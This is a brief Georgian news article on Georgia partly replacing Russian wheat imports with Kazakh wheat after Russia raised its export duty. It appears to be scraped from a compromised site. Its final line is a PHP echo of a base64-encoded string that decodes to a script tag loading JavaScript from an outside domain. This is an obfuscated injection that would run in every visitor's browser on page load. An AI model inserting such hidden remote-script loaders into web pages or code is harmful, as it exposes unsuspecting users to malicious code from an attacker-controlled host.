celsiusi
ავერსი საქკაბელი
საქართველო რუსულ ხორბალს ნაწილობრივ ყაზახური ხორბლით ჩაანაცვლებს,- ამის შესახებ „საქართველოს ხორბლისა და ფქვილის მწარმოებელთა ასოციაციის" აღმასრულებელმა დირექტორმა ლევან სილაგავამ განაცხადა.
 
მისივე თქმით, იმ ფონზე, რომ რუსეთმა საბაჟო გადასახადი გაზარდა, საქართველო რუსეთიდან იმპორტირებულ ხორბალს ნაწილობრივ სხვა ქვეყნებიდან იმპორტით ჩაანაცვლებს.
 
„დღეიდან, 1-ლი მარტიდან, რუსეთიდან გამოტანილი ხორბლის საბაჟო გადასახადი იზრდება და 50 ევრო ხდება. ამ ყველაფერმა საკმაოდ დაძაბა სიტუაცია მსოფლიო ბაზარზე, რადგან რუსეთი ერთ-ერთი დიდი მოთამაშეა და ყველა ქვეყნისთვის ხორბალი გაძვირდა. რუსეთი ყაზახური ხორბლით ჩანაცვლდა და სავარაუდოა, რომ ასევე უკრაინული და რუმინული ხორბლით ჩანაცვლდეს. ამ ეტაპზე მთლიანად არ გადავდივართ რუსულიდან ყაზახურ ხორბალზე, რადგან ყაზახური ხორბლის პოტენციალი არაა ისეთი, რომ ეყოს საქართველოს და სხვა ქვეყნებს, ამიტომ იქნება ნაწილობრივი ჩანაცვლება”,- აღნიშნა ლევან სილაგავამ მედიაცენტრ "მთავარში" გამართულ პრესკონფერენციაზე.
 
მისივე განცხადებით, ქვეყანას დაახლოებით 2 თვის ხორბლის გარდამავალი მარაგი მუდმივად აქვს, რაც რისკების შემთხვევაში, სასურსათო უსაფრთხოებას უზრუნველყოფს.
1213
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");